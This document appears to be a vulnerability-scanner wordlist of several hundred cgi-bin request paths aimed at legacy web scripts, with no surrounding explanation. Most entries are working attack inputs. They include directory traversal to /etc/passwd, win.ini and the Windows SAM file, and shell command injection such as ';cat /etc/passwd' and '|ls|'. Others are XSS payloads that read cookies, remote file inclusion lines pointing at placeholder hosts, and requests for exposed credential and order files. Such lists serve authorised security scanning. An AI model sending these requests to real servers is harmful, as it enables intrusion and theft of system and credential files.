cgi-bin/FileSeek.cgi?head=;cat%20/etc/passwd|&foot=
cgi-bin/FileSeek2.cgi?head=&foot=....//....//....//....//....//....//....//etc/passwd
cgi-bin/FileSeek2.cgi?head=&foot=;cat%20/etc/passwd
cgi-bin/FileSeek2.cgi?head=....//....//....//....//....//....//....//etc/passwd&foot=
cgi-bin/FileSeek2.cgi?head=;cat%20/etc/passwd|&foot=
cgi-bin/FormHandler.cgi?realname=aaa&email=aaa&reply_message_template=%2Fetc%2Fpasswd&reply_message_from=sq%40example.com&redirect=http%3A%2F%2Fwww.example.com&recipient=sq%40example.com
cgi-bin/FormMail.cgi?<script>alert(\"Vulnerable\");</script>
cgi-bin/GW5/GWWEB.EXE
cgi-bin/GW5/GWWEB.EXE?GET-CONTEXT&HTMLVER=AAA
cgi-bin/GW5/GWWEB.EXE?HELP=bad-request
cgi-bin/GWWEB.EXE?HELP=bad-request
cgi-bin/ImageFolio/admin/admin.cgi
cgi-bin/MachineInfo
cgi-bin/MsmMask.exe
cgi-bin/MsmMask.exe?mask=/junk334
cgi-bin/NUL/../../../../../../../../../WINNT/system32/ipconfig.exe
cgi-bin/PRN/../../../../../../../../../WINNT/system32/ipconfig.exe
cgi-bin/Pbcgi.exe
cgi-bin/SGB_DIR/superguestconfig
cgi-bin/SQLServ/sqlbrowse.asp?filepath=c:\&Opt=3
cgi-bin/Upload.pl
cgi-bin/VsSetCookie.exe?
cgi-bin/WINDMAIL.EXE?%20-n%20c:\boot.ini%
cgi-bin/WINDMAIL.EXE?%20-n%20c:\boot.ini%20Hacker@hax0r.com%20|%20dir%20c:\
cgi-bin/WS_FTP.ini
cgi-bin/Webnews.exe
cgi-bin/YaBB.pl?board=news&action=display&num=../../../../../../../../../../etc/passwd%00
cgi-bin/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script>
cgi-bin/a1disp3.cgi?../../../../../../../../../../etc/passwd
cgi-bin/a1stats/a1disp3.cgi?../../../../../../../../../../etc/passwd
cgi-bin/a1stats/a1disp3.cgi?../../../../../../../etc/passwd
cgi-bin/a1stats/a1disp4.cgi?../../../../../../../etc/passwd
cgi-bin/add_ftp.cgi
cgi-bin/addbanner.cgi
cgi-bin/adduser.cgi
cgi-bin/admin.cgi
cgi-bin/admin.cgi?list=../../../../../../../../../../etc/passwd
cgi-bin/admin.php
cgi-bin/admin.php3
cgi-bin/admin.pl
cgi-bin/admin/admin.cgi
cgi-bin/admin/setup.cgi
cgi-bin/adminhot.cgi
cgi-bin/adminwww.cgi
cgi-bin/af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd
cgi-bin/aglimpse
cgi-bin/aglimpse.cgi
cgi-bin/alibaba.pl|dir%20..\\..\\..\\..\\..\\..\\..\\,
cgi-bin/alienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd
cgi-bin/amadmin.pl
cgi-bin/anacondaclip.pl?template=../../../../../../../../../../etc/passwd
cgi-bin/ans.pl?p=../../../../../usr/bin/id|&blah
cgi-bin/ans/ans.pl?p=../../../../../usr/bin/id|&blah
cgi-bin/anyboard.cgi
cgi-bin/apexec.pl?etype=odp&template=../../../../../../../../../../etc/passwd%00.html&passurl=/category/
cgi-bin/archie
cgi-bin/architext_query.cgi
cgi-bin/architext_query.pl
cgi-bin/ash
cgi-bin/astrocam.cgi
cgi-bin/athcgi.exe?command=showpage&script='],[0,0]];alert('Vulnerable');a=[['
cgi-bin/atk/javascript/class.atkdateattribute.js.php?config_atkroot=http://xxxxxxxxxx/
cgi-bin/auction/auction.cgi?action=Sort_Page&View=Search&Page=0&Cat_ID=&Lang=English&Search=All&Terms=<script>alert('Vulnerable');</script>&Where=&Sort=Photo&Dir=
cgi-bin/auctiondeluxe/auction.pl
cgi-bin/auktion.cgi?menue=../../../../../../../../../../etc/passwd
cgi-bin/auth_data/auth_user_file.txt
cgi-bin/awl/auctionweaver.pl
cgi-bin/awstats.pl
cgi-bin/awstats/awstats.pl
cgi-bin/ax-admin.cgi
cgi-bin/ax.cgi
cgi-bin/axs.cgi
cgi-bin/badmin.cgi
cgi-bin/banner.cgi
cgi-bin/bannereditor.cgi
cgi-bin/bash
cgi-bin/bb-ack.sh
cgi-bin/bb-hist.sh?HISTFILE=../../../../../../../../../../etc/passwd
cgi-bin/bb-hist?HISTFILE=../../../../../../../../../../etc/passwd
cgi-bin/bb-histlog.sh
cgi-bin/bb-hostsvc.sh?HOSTSVC=../../../../../../../../../../etc/passwd
cgi-bin/bb-rep.sh
cgi-bin/bb-replog.sh
cgi-bin/bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
cgi-bin/bbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
cgi-bin/bbs_forum.cgi
cgi-bin/betsie/parserl.pl/<script>alert('Vulnerable')</script>;
cgi-bin/bigconf.cgi
cgi-bin/bigconf.cgi?command=view_textfile&file=/etc/passwd&filters=
cgi-bin/bizdb1-search.cgi
cgi-bin/blog/
cgi-bin/blog/mt-check.cgi
cgi-bin/blog/mt-load.cgi
cgi-bin/blog/mt.cfg
cgi-bin/bnbform
cgi-bin/bnbform.cgi
cgi-bin/book.cgi?action=default&current=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10
cgi-bin/boozt/admin/index.cgi?section=5&input=1
cgi-bin/bsguest.cgi?email=x;ls
cgi-bin/bslist.cgi?email=x;ls
cgi-bin/build.cgi
cgi-bin/bulk/bulk.cgi
cgi-bin/c32web.exe/ChangeAdminPassword
cgi-bin/c_download.cgi
cgi-bin/cached_feed.cgi
cgi-bin/cachemgr.cgi
cgi-bin/cal_make.pl?p0=../../../../../../../../../../etc/passwd%00
cgi-bin/calendar
cgi-bin/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
cgi-bin/calendar.pl
cgi-bin/calendar/calendar_admin.pl?config=|cat%20/etc/passwd|
cgi-bin/calendar/index.cgi
cgi-bin/calendar_admin.pl?config=|cat%20/etc/passwd|
cgi-bin/calender_admin.pl
cgi-bin/campas?%0acat%0a/etc/passwd%0a
cgi-bin/cart.pl
cgi-bin/cart.pl?db='
cgi-bin/cartmanager.cgi
cgi-bin/cbmc/forums.cgi
cgi-bin/ccbill-local.cgi?cmd=MENU
cgi-bin/ccbill-local.pl?cmd=MENU
cgi-bin/cfgwiz.exe
cgi-bin/cgforum.cgi
cgi-bin/cgi-lib.pl
cgi-bin/cgi-test.exe
cgi-bin/cgi_process
cgi-bin/cgicso?query=<script>alert('Vulnerable')</script>
cgi-bin/cgicso?query=AAA
cgi-bin/cgiforum.pl?thesection=../../../../../../../../../../etc/passwd%00
cgi-bin/cgimail.exe
cgi-bin/cgitest.exe
cgi-bin/cgiwrap
cgi-bin/cgiwrap/%3Cfont%20color=red%3E
cgi-bin/cgiwrap/~@USERS
cgi-bin/cgiwrap/~JUNK(5)
cgi-bin/cgiwrap/~root
cgi-bin/change-your-password.pl
cgi-bin/classifieds
cgi-bin/classifieds.cgi
cgi-bin/classifieds/classifieds.cgi
cgi-bin/classifieds/index.cgi
cgi-bin/clickcount.pl?view=test
cgi-bin/clickresponder.pl
cgi-bin/cmd.exe?/c+dir
cgi-bin/cmd1.exe?/c+dir
cgi-bin/code.php
cgi-bin/code.php3
cgi-bin/com5...................................................................................................................................................................................................
cgi-bin/com5.java
cgi-bin/com5.pl
cgi-bin/commandit.cgi
cgi-bin/commerce.cgi?page=../../../../../../../../../../etc/passwd%00index.html
cgi-bin/common.php?f=0&ForumLang=../../../../../../../../../../etc/passwd
cgi-bin/common/listrec.pl
cgi-bin/common/listrec.pl?APP=qmh-news&TEMPLATE=;ls%20/etc|
cgi-bin/compatible.cgi
cgi-bin/contents.htm
cgi-bin/count.cgi
cgi-bin/counter-ord
cgi-bin/counterbanner
cgi-bin/counterbanner-ord
cgi-bin/counterfiglet-ord
cgi-bin/counterfiglet/nc/
cgi-bin/csChatRBox.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')
cgi-bin/csGuestBook.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')
cgi-bin/csLiveSupport.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')
cgi-bin/csNews.cgi
cgi-bin/csNewsPro.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')
cgi-bin/csPassword.cgi
cgi-bin/csPassword/csPassword.cgi
cgi-bin/csSearch.cgi?command=savesetup&setup=`cat%20/etc/passwd`
cgi-bin/csh
cgi-bin/cstat.pl
cgi-bin/cutecast/members/
cgi-bin/cvsblame.cgi?file=<script>alert('Vulnerable')</script>
cgi-bin/cvslog.cgi?file=*&rev=&root=<script>alert('Vulnerable')</script>
cgi-bin/cvslog.cgi?file=<script>alert('Vulnerable')</script>
cgi-bin/cvsquery.cgi?branch=<script>alert('Vulnerable')</script>&file=<script>alert(document.domain)</script>&date=<script>alert(document.domain)</script>
cgi-bin/cvsquery.cgi?module=<script>alert('Vulnerable')</script>&branch=&dir=&file=&who=<script>alert(document.domain)</script>&sortby=Date&hours=2&date=week
cgi-bin/cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert('Vulnerable')</script>&branch=HEAD
cgi-bin/dansguardian.pl?DENIEDURL=</a><script>alert('Vulnerable');</script>
cgi-bin/dasp/fm_shell.asp
cgi-bin/data/fetch.php?page=
cgi-bin/date
cgi-bin/day5datacopier.cgi
cgi-bin/day5datanotifier.cgi
cgi-bin/db2www/library/document.d2w/show
cgi-bin/db4web_c/dbdirname//etc/passwd
cgi-bin/db_manager.cgi
cgi-bin/dbman/db.cgi?db=no-db
cgi-bin/dbmlparser.exe
cgi-bin/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd%00
cgi-bin/dcshop/auth_data/auth_user_file.txt
cgi-bin/dcshop/orders/orders.txt
cgi-bin/dfire.cgi
cgi-bin/diagnose.cgi
cgi-bin/dig.cgi
cgi-bin/directorypro.cgi?want=showcat&show=../../../../../../../../../../etc/passwd%00
cgi-bin/displayTC.pl
cgi-bin/dnewsweb
cgi-bin/donothing
cgi-bin/dose.pl?daily&somefile.txt&|ls|
cgi-bin/dumpenv.pl
cgi-bin/echo.bat
cgi-bin/echo.bat?&dir+c:\
cgi-bin/edit.pl
cgi-bin/empower?DB=whateverwhatever
cgi-bin/emu/html/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
cgi-bin/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
cgi-bin/emumail/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
cgi-bin/enter.cgi
cgi-bin/environ.cgi
cgi-bin/environ.pl
cgi-bin/environ.pl?param1=<script>alert(document.cookie)</script>
cgi-bin/erba/start/%3Cscript%3Ealert('Vulnerable');%3C/script%3E
cgi-bin/errors/needinit.php?GALLERY_BASEDIR=http://xxxxxxxx/
cgi-bin/eshop.pl/seite=;cat%20eshop.pl|
cgi-bin/ex-logger.pl
cgi-bin/excite
cgi-bin/excite;IFS=\"$\";/bin/cat
cgi-bin/ezadmin.cgi
cgi-bin/ezboard.cgi
cgi-bin/ezman.cgi
cgi-bin/ezshopper/loadpage.cgi?user_id=1&file=|cat%20/etc/passwd|
cgi-bin/ezshopper/search.cgi?user_id=id&database=dbase1.exm&template=../../../../../../../etc/passwd&distinct=1
cgi-bin/ezshopper2/loadpage.cgi
cgi-bin/ezshopper3/loadpage.cgi
cgi-bin/faqmanager.cgi?toc=/etc/passwd%00
cgi-bin/faxsurvey?cat%20/etc/passwd
cgi-bin/filemail
cgi-bin/filemail.pl
cgi-bin/fom.cgi?file=<script>alert('Vulnerable')</script>
cgi-bin/fom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable
cgi-bin/formmail.cgi?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test
cgi-bin/formmail.pl
cgi-bin/formmail.pl?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test
cgi-bin/formmail?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test
cgi-bin/fortune
cgi-bin/foxweb.dll
cgi-bin/foxweb.exe
cgi-bin/fpadmin.htm
cgi-bin/fpremadm.exe
cgi-bin/fpsrvadm.exe
cgi-bin/ftp.pl
cgi-bin/ftpsh
cgi-bin/gH.cgi
cgi-bin/gbadmin.cgi?action=change_adminpass
cgi-bin/gbadmin.cgi?action=change_automail
cgi-bin/gbadmin.cgi?action=colors
cgi-bin/gbadmin.cgi?action=setup
cgi-bin/gbook/gbook.cgi?_MAILTO=xx;ls
cgi-bin/gbpass.pl
cgi-bin/generate.cgi?content=../../../../../../../../../../etc/passwd%00board=board_1
cgi-bin/generate.cgi?content=../../../../../../../../../../windows/win.ini%00board=board_1
cgi-bin/generate.cgi?content=../../../../../../../../../../winnt/win.ini%00board=board_1
cgi-bin/getdoc.cgi
cgi-bin/gettransbitmap
cgi-bin/glimpse
cgi-bin/gm-cplog.cgi
cgi-bin/gm.cgi
cgi-bin/guestbook.cgi
cgi-bin/guestbook.cgi?user=cpanel&template=|/bin/cat%20/etc/passwd|
cgi-bin/guestbook.pl
cgi-bin/handler
cgi-bin/handler/netsonar;cat
cgi-bin/hello.bat?&dir+c:\
cgi-bin/hitview.cgi
cgi-bin/horde/test.php
cgi-bin/hpnst.exe?c=p+i=SrvSystemInfo.html
cgi-bin/hsx.cgi?show=../../../../../../../../../../../etc/passwd%00
cgi-bin/htgrep?file=index.html&hdr=/etc/passwd
cgi-bin/htimage.exe
cgi-bin/htimage.exe/path/filename?2,2
cgi-bin/html2chtml.cgi
cgi-bin/html2wml.cgi
cgi-bin/htmlscript?../../../../../../../../../../etc/passwd
cgi-bin/htsearch.cgi?words=%22%3E%3Cscript%3Ealert%'Vulnerable'%29%3B%3C%2Fscript%3E
cgi-bin/htsearch?-c/nonexistant
cgi-bin/htsearch?config=foofighter&restrict=&exclude=&method=and&format=builtin-long&sort=score&words=
cgi-bin/htsearch?exclude=%60/etc/passwd%60
cgi-bin/ibill.pm
cgi-bin/icat
cgi-bin/if/admin/nph-build.cgi
cgi-bin/ikonboard/help.cgi?
cgi-bin/imageFolio.cgi
cgi-bin/imagefolio/admin/admin.cgi
cgi-bin/imagemap
cgi-bin/imagemap.exe
cgi-bin/include/new-visitor.inc.php
cgi-bin/index.js0x70
cgi-bin/index.pl
cgi-bin/info2www
cgi-bin/infosrch.cgi
cgi-bin/input.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\
cgi-bin/input2.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\
cgi-bin/ion-p.exe?page=c:\winnt\repair\sam
cgi-bin/ion-p?page=../../../../../etc/passwd
cgi-bin/jailshell
cgi-bin/jj
cgi-bin/journal.cgi?folder=journal.cgi%00
cgi-bin/ksh
cgi-bin/lastlines.cgi?process
cgi-bin/listrec.pl
cgi-bin/loadpage.cgi?user_id=1&file=../../../../../../../../../../etc/passwd
cgi-bin/loadpage.cgi?user_id=1&file=..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini
cgi-bin/log-reader.cgi
cgi-bin/log/
cgi-bin/log/nether-log.pl?checkit
cgi-bin/login.cgi
cgi-bin/login.pl
cgi-bin/login.pl?course_id=\">&lt;SCRIPT&gt;alert('Vulnerable')&lt;/SCRIPT&gt;
cgi-bin/logit.cgi
cgi-bin/logs.pl
cgi-bin/logs/
cgi-bin/logs/access_log
cgi-bin/logs/error_log
cgi-bin/lookwho.cgi
cgi-bin/ls
cgi-bin/magiccard.cgi?pa=3Dpreview&amp;next=3Dcustom&amp;page=3D../../../../../../../../../../etc/passwd
cgi-bin/mail
cgi-bin/mail/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
cgi-bin/mail/nph-mr.cgi?do=loginhelp&configLanguage=../../../../../../../etc/passwd%00
cgi-bin/mailform.exe
cgi-bin/mailit.pl
cgi-bin/maillist.cgi
cgi-bin/maillist.pl
cgi-bin/mailnews.cgi
cgi-bin/main.cgi?board=FREE_BOARD&command=down_load&filename=../../../../../../../../../../etc/passwd
cgi-bin/main_menu.pl
cgi-bin/majordomo.pl
cgi-bin/man.sh
cgi-bin/man2html
cgi-bin/mastergate/search.cgi?search=0&search_on=all
cgi-bin/meta.pl
cgi-bin/mgrqcgi
cgi-bin/mini_logger.cgi
cgi-bin/minimal.exe
cgi-bin/mkilog.exe
cgi-bin/mkplog.exe
cgi-bin/mmstdod.cgi
cgi-bin/moin.cgi?test
cgi-bin/mojo/mojo.cgi
cgi-bin/mrtg.cfg?cfg=../../../../../../../../etc/passwd
cgi-bin/mrtg.cgi?cfg=../../../../../../../../etc/passwd
cgi-bin/mrtg.cgi?cfg=blah
cgi-bin/ms_proxy_auth_query/
cgi-bin/mt-static/
cgi-bin/mt-static/mt-check.cgi
cgi-bin/mt-static/mt-load.cgi
cgi-bin/mt-static/mt.cfg
cgi-bin/mt/
cgi-bin/mt/mt-check.cgi
cgi-bin/mt/mt-load.cgi
cgi-bin/mt/mt.cfg
cgi-bin/multihtml.pl?multi=/etc/passwd%00html
cgi-bin/musicqueue.cgi
cgi-bin/myguestbook.cgi?action=view
cgi-bin/namazu.cgi
cgi-bin/nbmember.cgi?cmd=list_all_users
cgi-bin/ncommerce3/ExecMacro/macro.d2w/%0a%0a
cgi-bin/ncommerce3/ExecMacro/macro.d2w/NOEXISTINGHTMLBLOCK
cgi-bin/netauth.cgi?cmd=show&page=../../../../../../../../../../etc/passwd
cgi-bin/netpad.cgi
cgi-bin/newsdesk.cgi?t=../../../../../../../../../../etc/passwd
cgi-bin/nimages.php
cgi-bin/nlog-smb.cgi
cgi-bin/nlog-smb.pl
cgi-bin/non-existent.pl
cgi-bin/noshell
cgi-bin/nph-emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
cgi-bin/nph-error.pl
cgi-bin/nph-exploitscanget.cgi
cgi-bin/nph-maillist.pl
cgi-bin/nph-publish
cgi-bin/nph-publish.cgi
cgi-bin/nph-showlogs.pl?files=../../&filter=.*&submit=Go&linecnt=500&refresh=0
cgi-bin/nph-test-cgi
cgi-bin/ntitar.pl
cgi-bin/opendir.php?/etc/passwd
cgi-bin/orders/orders.txt
cgi-bin/pagelog.cgi
cgi-bin/pals-cgi?palsAction=restart&documentName=/etc/passwd
cgi-bin/parse-file
cgi-bin/pass
cgi-bin/passwd
cgi-bin/passwd.txt
cgi-bin/password
cgi-bin/pbcgi.cgi?name=Joe%Camel&email=%3CSCRIPT%3Ealert%28%27Vulnerable%27%29%3B%3C%2FSCRIPT%3E
cgi-bin/perl
cgi-bin/perl.exe
cgi-bin/perl.exe?-v
cgi-bin/perl?-v
cgi-bin/pfdispaly.cgi?'%0A/bin/cat%20/etc/passwd|'
cgi-bin/pfdispaly.cgi?../../../../../../../../../../etc/passwd
cgi-bin/pfdisplay.cgi?'%0A/bin/cat%20/etc/passwd|'
cgi-bin/pfdisplay.cgi?../../../../../../etc/passwd
cgi-bin/phf
cgi-bin/phf.cgi?QALIAS=x%0a/bin/cat%20/etc/passwd
cgi-bin/phf?Qname=root%0Acat%20/etc/passwd%20
cgi-bin/photo/
cgi-bin/photo/manage.cgi
cgi-bin/php-cgi
cgi-bin/php.cgi?/etc/passwd
cgi-bin/plusmail
cgi-bin/pollit/Poll_It_SSI_v2.0.cgi?data_dir=\etc\passwd%00
cgi-bin/pollssi.cgi
cgi-bin/post-query
cgi-bin/post16.exe
cgi-bin/post32.exe|dir%20c:\
cgi-bin/post_query
cgi-bin/postcards.cgi
cgi-bin/powerup/r.cgi?FILE=../../../../../../../../../../etc/passwd
cgi-bin/ppdscgi.exe
cgi-bin/printenv
cgi-bin/printenv.tmp
cgi-bin/probecontrol.cgi?command=enable&username=cancer&password=killer
cgi-bin/processit.pl
cgi-bin/profile.cgi
cgi-bin/pu3.pl
cgi-bin/publisher/search.cgi?dir=jobs&template=;cat%20/etc/passwd|&output_number=10
cgi-bin/query
cgi-bin/query?mss=%2e%2e/config
cgi-bin/quickstore.cgi?page=../../../../../../../../../../etc/passwd%00html&cart_id=
cgi-bin/quikstore.cfg
cgi-bin/quizme.cgi
cgi-bin/r.cgi?FILE=../../../../../../../../../../etc/passwd
cgi-bin/ratlog.cgi
cgi-bin/redir.exe?URL=http%3A%2F%2Fwww%2Egoogle%2Ecom%2F%0D%0A%0D%0A%3CSCRIPT%3Ealert%28%27Vulnerable%27%29%3C%2FSCRIPT%3E
cgi-bin/redirect
cgi-bin/register.cgi
cgi-bin/replicator/webpage.cgi/
cgi-bin/responder.cgi
cgi-bin/retrieve_password.pl
cgi-bin/rguest.exe
cgi-bin/rightfax/fuwww.dll/?
cgi-bin/rksh
cgi-bin/rmp_query
cgi-bin/robadmin.cgi
cgi-bin/robpoll.cgi
cgi-bin/rpm_query
cgi-bin/rsh
cgi-bin/rtm.log
cgi-bin/rwcgi60
cgi-bin/rwcgi60/showenv
cgi-bin/rwwwshell.pl
cgi-bin/sawmill5?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1
cgi-bin/sawmill?rfcf+%22SawmillInfo/SawmillPassword%22+spbn+1,1,21,1,1,1,1,1,1,1,1,1+3
cgi-bin/sbcgi/sitebuilder.cgi
cgi-bin/scoadminreg.cgi
cgi-bin/scripts/*%0a.pl
cgi-bin/scripts/slxweb.dll/getfile?type=Library&file=[invalid
cgi-bin/search
cgi-bin/search.cgi
cgi-bin/search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini
cgi-bin/search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini
cgi-bin/search.php?searchstring=<script>alert(document.cookie)</script>
cgi-bin/search.pl
cgi-bin/search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script>
cgi-bin/search.pl?form=../../../../../../../../../../etc/passwd%00
cgi-bin/search/search.cgi?keys=*&prc=any&catigory=../../../../../../../../../../../../etc
cgi-bin/sendform.cgi
cgi-bin/sendpage.pl?message=test\;/bin/ls%20/etc;echo%20\message
cgi-bin/sendtemp.pl?templ=../../../../../../../../../../etc/passwd
cgi-bin/sensepost.exe?/c+dir
cgi-bin/session/adminlogin
cgi-bin/sewse?/home/httpd/html/sewse/jabber/comment2.jse+/etc/passwd
cgi-bin/sh
cgi-bin/shop.cgi?page=../../../../../../../etc/passwd
cgi-bin/shop.pl/page=;cat%20shop.pl|
cgi-bin/shop/auth_data/auth_user_file.txt
cgi-bin/shop/orders/orders.txt
cgi-bin/shopper.cgi?newpage=../../../../../../../../../../etc/passwd
cgi-bin/shopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;cat%20/etc/passwd|
cgi-bin/show.pl
cgi-bin/showcheckins.cgi?person=<script>alert('Vulnerable')</script>
cgi-bin/showuser.cgi
cgi-bin/shtml.dll
cgi-bin/simple/view_page?mv_arg=|cat%20/etc/passwd|
cgi-bin/simplestguest.cgi
cgi-bin/simplestmail.cgi
cgi-bin/smartsearch.cgi?keywords=|/bin/cat%20/etc/passwd|
cgi-bin/smartsearch/smartsearch.cgi?keywords=|/bin/cat%20/etc/passwd|
cgi-bin/snorkerz.bat
cgi-bin/snorkerz.cmd
cgi-bin/sojourn.cgi?cat=../../../../../../../../../../etc/password%00
cgi-bin/spin_client.cgi?aaaaaaaa
cgi-bin/ss
cgi-bin/sscd_suncourier.pl
cgi-bin/ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
cgi-bin/start.cgi/%3Cscript%3Ealert('Vulnerable');%3C/script%3E
cgi-bin/stat.pl
cgi-bin/stat/
cgi-bin/stats-bin-p/reports/index.html
cgi-bin/stats.pl
cgi-bin/stats.prf
cgi-bin/stats/
cgi-bin/stats/statsbrowse.asp?filepath=c:\&Opt=3
cgi-bin/stats_old/
cgi-bin/statsconfig
cgi-bin/statusconfig.pl
cgi-bin/statview.pl
cgi-bin/store.cgi?StartID=../../../../../../../../../../etc/passwd%00.html
cgi-bin/store/agora.cgi?cart_id=<script>alert('Vulnerable')</script>
cgi-bin/store/agora.cgi?page=whatever33.html
cgi-bin/store/index.cgi?page=../../../../../../../../etc/passwd
cgi-bin/story.pl?next=../../../../../../../../../../etc/passwd%00
cgi-bin/story/story.pl?next=../../../../../../../../../../etc/passwd%00
cgi-bin/survey
cgi-bin/survey.cgi
cgi-bin/sws/admin.html
cgi-bin/sws/manager.pl
cgi-bin/tablebuild.pl
cgi-bin/talkback.cgi?article=../../../../../../../../etc/passwd%00&action=view&matchview=1
cgi-bin/tcsh
cgi-bin/technote/main.cgi?board=FREE_BOARD&command=down_load&filename=/../../../../../../../../../../etc/passwd
cgi-bin/test-cgi
cgi-bin/test-cgi.bat
cgi-bin/test-cgi.exe?<script>alert(document.cookie)</script>
cgi-bin/test-cgi.tcl
cgi-bin/test-cgi?/*
cgi-bin/test-env
cgi-bin/test.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\
cgi-bin/test.cgi
cgi-bin/test/test.cgi
cgi-bin/test2.pl?&lt;script&gt;alert('Vulnerable');&lt;/script&gt;
cgi-bin/testcgi.exe
cgi-bin/testcgi.exe?<script>alert(document.cookie)</script>
cgi-bin/testing_whatever
cgi-bin/texis.exe/junk
cgi-bin/texis/junk
cgi-bin/texis/phine
cgi-bin/textcounter.pl
cgi-bin/tidfinder.cgi
cgi-bin/tigvote.cgi
cgi-bin/title.cgi
cgi-bin/tpgnrock
cgi-bin/traffic.cgi?cfg=../../../../../../../../etc/passwd
cgi-bin/troops.cgi
cgi-bin/tst.bat|dir%20..\\..\\..\\..\\..\\..\\..\\..\\,
cgi-bin/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../etc/passwd
cgi-bin/ultraboard.cgi
cgi-bin/ultraboard.pl
cgi-bin/unlg1.1
cgi-bin/unlg1.2
cgi-bin/update.dpgs
cgi-bin/upload.cgi
cgi-bin/uptime
cgi-bin/urlcount.cgi?%3CIMG%20SRC%3D%22%22%20ONERROR%3D%22alert%28%27Vulnerable%27%29%22%3E
cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd
cgi-bin/utm/admin
cgi-bin/utm/utm_stat
cgi-bin/view-source
cgi-bin/view-source?view-source
cgi-bin/view_item?HTML_FILE=../../../../../../../../../../etc/passwd%00
cgi-bin/viewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script>
cgi-bin/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\"><script>alert('Vulnerable')</script>;
cgi-bin/viewlogs.pl
cgi-bin/viewsource?/etc/passwd
cgi-bin/viralator.cgi
cgi-bin/virgil.cgi
cgi-bin/visadmin.exe
cgi-bin/visitor.exe
cgi-bin/vote.cgi
cgi-bin/vpasswd.cgi
cgi-bin/vq/demos/respond.pl?<script>alert('Vulnerable')</script>
cgi-bin/w3-msql
cgi-bin/w3-sql
cgi-bin/wais.pl
cgi-bin/way-board.cgi?db=/etc/passwd%00
cgi-bin/way-board/way-board.cgi?db=/etc/passwd%00
cgi-bin/wconsole.dll
cgi-bin/webais
cgi-bin/webbbs.cgi
cgi-bin/webbbs.exe
cgi-bin/webbbs/webbbs_config.pl?name=joe&email=test@example.com&body=aaaaffff&followup=10;cat%20/etc/passwd
cgi-bin/webcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;cat%20/etc/passwd|&CODE=PHOLD
cgi-bin/webdist.cgi
cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd
cgi-bin/webdriver
cgi-bin/webfind.exe?keywords=01234567890123456789
cgi-bin/webgais
cgi-bin/webif.cgi
cgi-bin/webmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
cgi-bin/webmap.cgi
cgi-bin/webnews.pl
cgi-bin/webplus.exe?about
cgi-bin/webplus?about
cgi-bin/webplus?script=../../../../../../../../../../etc/passwd
cgi-bin/websendmail
cgi-bin/webspirs.cgi?sp.nextform=../../../../../../../../../../etc/passwd
cgi-bin/webutil.pl
cgi-bin/webutils.pl
cgi-bin/webwho.pl
cgi-bin/wguest.exe
cgi-bin/where.pl?sd=ls%20/etc
cgi-bin/whois.cgi?action=load&whois=%3Bid
cgi-bin/whois.cgi?lookup=;&ext=/bin/cat%20/etc/passwd
cgi-bin/whois/whois.cgi?lookup=;&ext=/bin/cat%20/etc/passwd
cgi-bin/whois_raw.cgi?fqdn=%0Acat%20/etc/passwd
cgi-bin/windmail
cgi-bin/windmail.exe
cgi-bin/wrap
cgi-bin/ws_ftp.ini
cgi-bin/www-sql
cgi-bin/wwwadmin.pl
cgi-bin/wwwboard.cgi.cgi
cgi-bin/wwwboard.pl
cgi-bin/wwwstats.pl
cgi-bin/wwwthreads/3tvars.pm
cgi-bin/wwwthreads/w3tvars.pm
cgi-bin/wwwwais
cgi-bin/zml.cgi?file=../../../../../../../../../../etc/passwd%00
cgi-bin/zsh
cgi-dos/args.bat
cgi-lib.pl
cgi-local/cgiemail-1.4/cgicso?query=<script>alert('Vulnerable')</script>
cgi-local/cgiemail-1.4/cgicso?query=AAA
cgi-local/cgiemail-1.6/cgicso?query=<script>alert('Vulnerable')</script>
